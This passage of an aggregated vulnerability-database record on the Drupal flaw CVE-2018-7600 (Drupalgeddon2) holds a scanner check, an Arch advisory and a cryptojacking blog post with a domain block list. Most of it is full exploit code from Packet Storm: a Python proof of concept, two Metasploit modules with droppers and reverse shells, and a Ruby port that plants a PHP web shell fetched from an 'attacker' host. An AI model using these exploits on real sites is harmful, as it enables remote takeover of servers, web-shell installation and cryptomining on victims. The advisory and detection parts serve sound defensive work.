Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874383\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:34 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6923\", \"CVE-2017-6924\", \"CVE-2017-6925\",\n \"CVE-2017-6920\", \"CVE-2017-6921\", \"CVE-2017-6922\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 26\");\n script_tag(name:\"solution\", 
value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.3.9~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2021-07-28T14:34:04", "description": "Arch Linux Security Advisory ASA-201804-1\n=========================================\n\nSeverity: Critical\nDate : 2018-04-01\nCVE-ID : CVE-2018-7600\nPackage : drupal\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-665\n\nSummary\n=======\n\nThe package drupal before version 8.5.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 8.5.1-1.\n\n# pacman -Syu \"drupal>=8.5.1-1\"\n\nThe problem has been fixed upstream in version 8.5.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA remote code execution vulnerability exists within multiple subsystems\nof Drupal 7.x and 8.x. 
This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being completely compromised.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code by performing a\nspecially crafted request.\n\nReferences\n==========\n\nhttps://www.drupal.org/sa-core-2018-002\nhttps://www.tenable.com/blog/critical-drupal-core-vulnerability-what-you-need-to-know\nhttps://github.com/drupal/drupal/commit/5ac8738fa69df34a0635f0907d661b509ff9a28f\nhttps://security.archlinux.org/CVE-2018-7600", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-01T00:00:00", "type": "archlinux", "title": "[ASA-201804-1] drupal: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-01T00:00:00", "id": "ASA-201804-1", "href": "https://security.archlinux.org/ASA-201804-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-04-14T02:40:10", "description": "", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "packetstorm", "title": "Drupal Drupalgeddon2 
Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "PACKETSTORM:147181", "href": "https://packetstormsecurity.com/files/147181/Drupal-Drupalgeddon2-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env \nimport sys \nimport requests \n \nprint ('################################################################') \nprint ('# Proof-Of-Concept for CVE-2018-7600') \nprint ('# by Vitalii Rudnykh') \nprint ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders') \nprint ('# https://github.com/a2u/CVE-2018-7600') \nprint ('################################################################') \nprint ('Provided only for educational or information purposes\\n') \n \ntarget = raw_input('Enter target url (example: https://domain.ltd/): ') \n \nurl = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \npayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'} \n \nr = requests.post(url, data=payload) \nif r.status_code != 200: \nsys.exit(\"Not exploitable\") \nprint ('\\nCheck: '+target+'hello.txt') \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147181/drupalgeddon2poc-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-27T01:05:58", "description": "", "cvss3": {}, "published": "2018-04-26T00:00:00", "type": "packetstorm", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-26T00:00:00", "id": "PACKETSTORM:147392", "href": "https://packetstormsecurity.com/files/147392/Drupal-Drupalgeddon-2-Forms-API-Property-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: 
https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# XXX: CmdStager can't handle badchars \ninclude Msf::Exploit::PhpEXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection', \n'Description' => %q{ \nThis module exploits a Drupal property injection in the Forms API. \n \nDrupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. \n}, \n'Author' => [ \n'Jasper Mattsson', # Vulnerability discovery \n'a2u', # Proof of concept (Drupal 8.x) \n'Nixawk', # Proof of concept (Drupal 8.x) \n'FireFart', # Proof of concept (Drupal 7.x) \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2018-7600'], \n['URL', 'https://www.drupal.org/sa-core-2018-002'], \n['URL', 'https://greysec.net/showthread.php?tid=2912'], \n['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], \n['URL', 'https://github.com/a2u/CVE-2018-7600'], \n['URL', 'https://github.com/nixawk/labs/issues/19'], \n['URL', 'https://github.com/FireFart/CVE-2018-7600'], \n['AKA', 'SA-CORE-2018-002'], \n['AKA', 'Drupalgeddon 2'] \n], \n'DisclosureDate' => 'Mar 28 2018', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'linux'], \n'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Payload' => {'BadChars' => '&>\\''}, \n# XXX: Using \"x\" in Gem::Version::new isn't technically appropriate \n'Targets' => [ \n# \n# Automatic targets (PHP, cmd/unix, native) \n# \n['Automatic (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php_memory \n], \n['Automatic (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php_dropper \n], \n['Automatic (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory \n], \n['Automatic (Linux Dropper)', \n'Platform' 
=> 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper \n], \n# \n# Drupal 7.x targets (PHP, cmd/unix, native) \n# \n['Drupal 7.x (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :php_memory \n], \n['Drupal 7.x (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :php_dropper \n], \n['Drupal 7.x (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Version' => Gem::Version.new('7.x'), \n'Type' => :unix_memory \n], \n['Drupal 7.x (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Version' => Gem::Version.new('7.x'), \n'Type' => :linux_dropper \n], \n# \n# Drupal 8.x targets (PHP, cmd/unix, native) \n# \n['Drupal 8.x (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :php_memory \n], \n['Drupal 8.x (PHP Dropper)', \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :php_dropper \n], \n['Drupal 8.x (Unix In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Version' => Gem::Version.new('8.x'), \n'Type' => :unix_memory \n], \n['Drupal 8.x (Linux Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Version' => Gem::Version.new('8.x'), \n'Type' => :linux_dropper \n] \n], \n'DefaultTarget' => 0, # Automatic (PHP In-Memory) \n'DefaultOptions' => {'WfsDelay' => 2} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path to Drupal install', '/']), \nOptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']), \nOptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false]) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp']) \n]) \nend \n \ndef check \ncheckcode = CheckCode::Safe \n \nif 
drupal_version \nprint_status(\"Drupal #{@version} targeted at #{full_uri}\") \ncheckcode = CheckCode::Detected \nelse \nprint_error('Could not determine Drupal version to target') \nreturn CheckCode::Unknown \nend \n \nif drupal_unpatched? \nprint_good('Drupal appears unpatched in CHANGELOG.txt') \ncheckcode = CheckCode::Appears \nend \n \ntoken = random_crap \nres = execute_command(token, func: 'printf') \n \nif res && res.body.start_with?(token) \ncheckcode = CheckCode::Vulnerable \nend \n \ncheckcode \nend \n \ndef exploit \nunless check == CheckCode::Vulnerable || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Set ForceExploit to override') \nend \n \nif datastore['PAYLOAD'] == 'cmd/unix/generic' \nprint_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') \n# XXX: Naughty datastore modification \ndatastore['DUMP_OUTPUT'] = true \nend \n \n# NOTE: assert() is attempted first, then PHP_FUNC if that fails \ncase target['Type'] \nwhen :php_memory \nexecute_command(payload.encoded, func: 'assert') \n \nsleep(wfs_delay) \nreturn if session_created? \n \n# XXX: This will spawn a *very* obvious process \nexecute_command(\"php -r '#{payload.encoded}'\") \nwhen :unix_memory \nexecute_command(payload.encoded) \nwhen :php_dropper, :linux_dropper \ndropper_assert \n \nsleep(wfs_delay) \nreturn if session_created? 
\n \ndropper_exec \nend \nend \n \ndef dropper_assert \nphp_file = Pathname.new( \n\"#{datastore['WritableDir']}/#{random_crap}.php\" \n).cleanpath \n \n# Return the PHP payload or a PHP binary dropper \ndropper = get_write_exec_payload( \nwritable_path: datastore['WritableDir'], \nunlink_self: true # Worth a shot \n) \n \n# Encode away potential badchars with Base64 \ndropper = Rex::Text.encode_base64(dropper) \n \n# Stage 1 decodes the PHP and writes it to disk \nstage1 = %Q{ \nfile_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\")); \n} \n \n# Stage 2 executes said PHP in-process \nstage2 = %Q{ \ninclude_once(\"#{php_file}\"); \n} \n \n# :unlink_self may not work, so let's make sure \nregister_file_for_cleanup(php_file) \n \n# Hopefully pop our shell with assert() \nexecute_command(stage1.strip, func: 'assert') \nexecute_command(stage2.strip, func: 'assert') \nend \n \ndef dropper_exec \nphp_file = \"#{random_crap}.php\" \ntmp_file = Pathname.new( \n\"#{datastore['WritableDir']}/#{php_file}\" \n).cleanpath \n \n# Return the PHP payload or a PHP binary dropper \ndropper = get_write_exec_payload( \nwritable_path: datastore['WritableDir'], \nunlink_self: true # Worth a shot \n) \n \n# Encode away potential badchars with Base64 \ndropper = Rex::Text.encode_base64(dropper) \n \n# :unlink_self may not work, so let's make sure \nregister_file_for_cleanup(php_file) \n \n# Write the payload or dropper to disk (!) \n# NOTE: Analysis indicates > is a badchar for 8.x \nexecute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\") \n \n# Attempt in-process execution of our PHP script \nsend_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, php_file) \n) \n \nsleep(wfs_delay) \nreturn if session_created? \n \n# Try to get a shell with PHP CLI \nexecute_command(\"php #{php_file}\") \n \nsleep(wfs_delay) \nreturn if session_created? 
\n \nregister_file_for_cleanup(tmp_file) \n \n# Fall back on our temp file \nexecute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\") \nexecute_command(\"php #{tmp_file}\") \nend \n \ndef execute_command(cmd, opts = {}) \nfunc = opts[:func] || datastore['PHP_FUNC'] || 'passthru' \n \nvprint_status(\"Executing with #{func}(): #{cmd}\") \n \nres = \ncase @version.to_s \nwhen '7.x' \nexploit_drupal7(func, cmd) \nwhen '8.x' \nexploit_drupal8(func, cmd) \nend \n \nif res && res.code != 200 \nprint_error(\"Unexpected reply: #{res.inspect}\") \nreturn \nend \n \nif res && datastore['DUMP_OUTPUT'] \nprint_line(res.body) \nend \n \nres \nend \n \ndef drupal_version \nif target['Version'] \n@version = target['Version'] \nreturn @version \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => target_uri.path \n) \n \nreturn unless res && res.code == 200 \n \n# Check for an X-Generator header \n@version = \ncase res.headers['X-Generator'] \nwhen /Drupal 7/ \nGem::Version.new('7.x') \nwhen /Drupal 8/ \nGem::Version.new('8.x') \nend \n \nreturn @version if @version \n \n# Check for a <meta> tag \ngenerator = res.get_html_document.at( \n'//meta[@name = \"Generator\"]/@content' \n) \n \nreturn unless generator \n \n@version = \ncase generator.value \nwhen /Drupal 7/ \nGem::Version.new('7.x') \nwhen /Drupal 8/ \nGem::Version.new('8.x') \nend \nend \n \ndef drupal_unpatched? 
\nunpatched = true \n \n# Check for patch level in CHANGELOG.txt \nuri = \ncase @version.to_s \nwhen '7.x' \nnormalize_uri(target_uri.path, 'CHANGELOG.txt') \nwhen '8.x' \nnormalize_uri(target_uri.path, 'core/CHANGELOG.txt') \nend \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => uri \n) \n \nreturn unless res && res.code == 200 \n \nif res.body.include?('SA-CORE-2018-002') \nunpatched = false \nend \n \nunpatched \nend \n \ndef exploit_drupal7(func, code) \nvars_get = { \n'q' => 'user/password', \n'name[#post_render][]' => func, \n'name[#markup]' => code, \n'name[#type]' => 'markup' \n} \n \nvars_post = { \n'form_id' => 'user_pass', \n'_triggering_element_name' => 'name' \n} \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \n \nreturn res unless res && res.code == 200 \n \nform_build_id = res.get_html_document.at( \n'//input[@name = \"form_build_id\"]/@value' \n) \n \nreturn res unless form_build_id \n \nvars_get = { \n'q' => \"file/ajax/name/#value/#{form_build_id.value}\" \n} \n \nvars_post = { \n'form_build_id' => form_build_id.value \n} \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \nend \n \ndef exploit_drupal8(func, code) \n# Clean URLs are enabled by default and \"can't\" be disabled \nuri = normalize_uri(target_uri.path, 'user/register') \n \nvars_get = { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => 1, \n'_wrapper_format' => 'drupal_ajax' \n} \n \nvars_post = { \n'form_id' => 'user_register_form', \n'_drupal_ajax' => 1, \n'mail[#type]' => 'markup', \n'mail[#post_render][]' => func, \n'mail[#markup]' => code \n} \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'vars_get' => vars_get, \n'vars_post' => vars_post \n) \nend \n \ndef random_crap \nRex::Text.rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "sourceHref": 
"https://packetstormsecurity.com/files/download/147392/drupal_drupalgeddon2.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-14T02:40:10", "description": "", "cvss3": {}, "published": "2018-04-13T00:00:00", "type": "packetstorm", "title": "Drupal Drupalgeddon2 Remote Code Execution Ruby Port", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-13T00:00:00", "id": "PACKETSTORM:147182", "href": "https://packetstormsecurity.com/files/147182/Drupal-Drupalgeddon2-Remote-Code-Execution-Ruby-Port.html", "sourceData": "`require 'net/http' \n \n# Hans Topo ruby port from Drupalggedon2 exploit. \n# Based on Vitalii Rudnykh exploit \n \ntarget = ARGV[0] \ncommand = ARGV[1] \n \nurl = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' \n \nshell = \"<?php system($_GET['cmd']); ?>\" \n \npayload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec' \n \nuri = URI(url) \n \nhttp = Net::HTTP.new(uri.host,uri.port) \n \nif uri.scheme == 'https' \nhttp.use_ssl = true \nhttp.verify_mode = OpenSSL::SSL::VERIFY_NONE \nend \n \nreq = Net::HTTP::Post.new(uri.path) \nreq.body = payload \n \nresponse = http.request(req) \n \nif response.code != \"200\" \nputs \"[*] Response: \" + response.code \nputs \"[*] Target seems not to be exploitable\" \nexit \nend \n \nputs \"[*] Target seems to be exploitable.\" \n \nexploit_uri = URI(target+\"/sh.php?cmd=#{command}\") \nresponse = Net::HTTP.get_response(exploit_uri) \nputs response.body \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/147182/drupalgeddon2poc2-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-19T09:07:42", "description": "", "cvss3": {}, "published": "2018-04-17T00:00:00", 
"type": "packetstorm", "title": "Drupalgeddon2 Drupal Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-17T00:00:00", "id": "PACKETSTORM:147247", "href": "https://packetstormsecurity.com/files/147247/Drupalgeddon2-Drupal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Drupalgeddon2', \n'Description' => %q{ \nCVE-2018-7600 / SA-CORE-2018-002 \nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 \nallows remote attackers to execute arbitrary code because of an issue affecting \nmultiple subsystems with default or common module configurations. \n \nThe module can load msf PHP arch payloads, using the php/base64 encoder. 
\n \nThe resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Vitalii Rudnykh', # initial PoC \n'Hans Topo', # further research and ruby port \n'JosA(c) Ignacio Rojo' # further research and msf module \n], \n'References' => \n[ \n['SA-CORE', '2018-002'], \n['CVE', '2018-7600'], \n], \n'DefaultOptions' => \n{ \n'encoder' => 'php/base64', \n'payload' => 'php/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => [ARCH_PHP], \n'Targets' => \n[ \n['User register form with exec', {}], \n], \n'DisclosureDate' => 'Apr 15 2018', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']), \n]) \n \nregister_advanced_options( \n[ \n \n]) \nend \n \ndef uri_path \nnormalize_uri(target_uri.path) \nend \n \ndef exploit_user_register \ndata = Rex::MIME::Message.new \ndata.add_part(\"php -r '#{payload.encoded}'\", nil, nil, 'form-data; name=\"mail[#markup]\"') \ndata.add_part('markup', nil, nil, 'form-data; name=\"mail[#type]\"') \ndata.add_part('user_register_form', nil, nil, 'form-data; name=\"form_id\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"_drupal_ajax\"') \ndata.add_part('exec', nil, nil, 'form-data; name=\"mail[#post_render][]\"') \npost_data = data.to_s \n \n# /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri_path}user/register\", \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'vars_get' => { \n'element_parents' => 'account/mail/#value', \n'ajax_form' => '1', \n'_wrapper_format' => 'drupal_ajax', \n} \n}) \nend \n \n## \n# Main \n## \n \ndef exploit \ncase datastore['TARGET'] \nwhen 0 \nexploit_user_register \nelse \nfail_with(Failure::BadConfig, \"Invalid target selected.\") \nend \nend \nend \n \n`\n", 
"sourceHref": "https://packetstormsecurity.com/files/download/147247/drupalgeddon2-exec.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "description": "[](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>)Qualys Malware Research Labs is announcing the release of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension to detect and block browser-based cryptocurrency mining, aka _cryptojacking_.\n\n### Cryptojacking\n\nCryptojacking attacks leverage the victim system\u2019s resources via malicious JavaScript to mine certain cryptocurrencies. Attackers carry out these attacks by infecting popular sites with JavaScript that enables cryptojacking. Any visitor to such sites will download the JavaScript and unknowingly contribute their system resources to mine a cryptocurrency that is added to the attacker\u2019s wallet. The resource-intensive mining process carried out on victim systems typically consumes more than 70% of CPU, which reduces system performance, increases power consumption and can possibly cause permanent damage to the system.\n\nBecause cryptojacking helps attackers earn cryptocurrency without spending a dime on mining infrastructure, it is very profitable. The overall cryptocurrency market capitalization has reached more than $270 billion as of July 2018 with more than 1700 active projects! There is a lot of money to be made for attackers leveraging these projects, and cryptomining is gradually moving to the center stage of the threat landscape as an even more attractive option compared to the recent favorite ransomware campaigns.\n\nCryptojacking has also gone mainstream recently because it is safer for cyber criminals and webmasters than ransomware, which requires interaction with the victim to collect payment. 
And because cryptojacking is browser based, it is easier to infect victims than hacking into servers. As cryptomining becomes more resource-intensive over time in terms of compute power and electricity consumption required, stealing those resources is becoming more enticing to attackers.\n\n### Cryptojacking and Monero\n\n[Monero (XMR)](<https://en.wikipedia.org/wiki/Monero_\\(cryptocurrency\\)>), a relatively new cryptocurrency, is becoming a more common target of cryptojacking attackers because its mining algorithm ([CryptoNight](<https://en.wikipedia.org/wiki/CryptoNote#Egalitarian_proof_of_work>)) is designed for easy integration and because its privacy and anonymity features also benefit hackers. Monero\u2019s proof-of-work mining algorithm can be used with desktop- or server-grade CPUs rather than custom-built specialized ASIC or GPU hardware that is required for traditional coin mining algorithms. This is an important aspect of new generation cryptocurrency, as it tries to be decentralized and avoid enabling a small set of users with access to specialized hardware from creating a mining monopoly. From an attacker\u2019s standpoint, the possibility of making sizable profits off desktop-grade CPUs with added privacy is a lucrative option.\n\nA popular technology used in most browser based cryptocurrency mining algorithms is WASM, short for WebAssembly. It is a binary executable format for the web that makes JavaScript execution within the browser quite efficient.\n\n\n\n_Fig. 1 CryptoNight based cryptocurrencies market capitalization, June 2018. Source: <https://coinmarketcap.com>_\n\n \n\n### Infections\n\nThe security research blog [Bad Packet Reports](<https://badpackets.net/>) recently published an [article](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) that stated the presence of more than 100,000 sites that are currently infected with cryptojacking malware. 
Most of these sites seem to be compromised using a [Drupalgeddon 2](<https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql>) exploit. The attack exploits the vulnerability [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>), even though the [patch](<https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch>) has been available for several months. [Side note: Always patch regularly!] There are reports of malware campaigns leveraging a recently released exploit for this vulnerability to compromise victims and inject coin mining scripts. Once a user visits these compromised sites, their system unwittingly contributes towards solving a crypto puzzle that benefits attackers.\n\nTo protect users from having their computing resources drained by unauthorized coin mining scripts, one needs to block access to the following popular coin mining services:\n\n * coinhive[.]com\n * load[.]jsecoin[.]com\n * crypto-loot[.]com\n * coin-have[.]com\n * ppoi[.]org\n * cryptoloot[.]pro\n * papoto[.]com\n * coinlab[.]biz\n\n### Qualys BrowserCheck CoinBlocker Extension for Google Chrome\n\nBased on extensive research from Qualys Malware Research Labs, we are announcing [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>), a new Google Chrome browser extension to protect users from browser-based coin mining attacks.\n\nHere are a few screenshots of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) in action:\n\n \n\n\n\n_Fig. 2 Qualys BrowserCheck CoinBlocker_\n\n \n\n\n\n_Fig. 
3 Qualys BrowserCheck CoinBlocker Detection Logs_\n\n \n\nQualys BrowserCheck CoinBlocker Extension relies not only on a domain blacklist but also on heuristics to identify underlying cryptomining algorithms like CryptoNight (used for mining Monero) and its various artifacts.\n\n### Detecting Traditional Cryptomining Threats\n\nAdditionally, cryptomining is not just limited to browser-based scripts, as we have seen certain attackers infect systems with persistent malware that runs outside of a browser to perform cryptomining. To help detect such malware, security professionals can use the [Qualys Indication of Compromise](<https://www.qualys.com/apps/indication-of-compromise/>) (IOC) solution to gain 2-second visibility into coin mining and other malware across their entire organization. Qualys IOC includes behaviour-based malware family detection for the following coin mining threats:\n\n * CryptoMinerA\n * CryptoMinerB\n * CryptoMinerC\n * CryptoMinerD\n * CryptoMinerE\n * Neksminer\n\nCryptomining is a rising online threat that is expected to grow as digital currencies and blockchain technologies gain wider acceptance. Attackers are employing various techniques to use unsuspecting users' systems for malicious purposes. We advise our users to regularly scan systems for vulnerabilities using tools like [Qualys BrowserCheck](<https://browsercheck.qualys.com/>). 
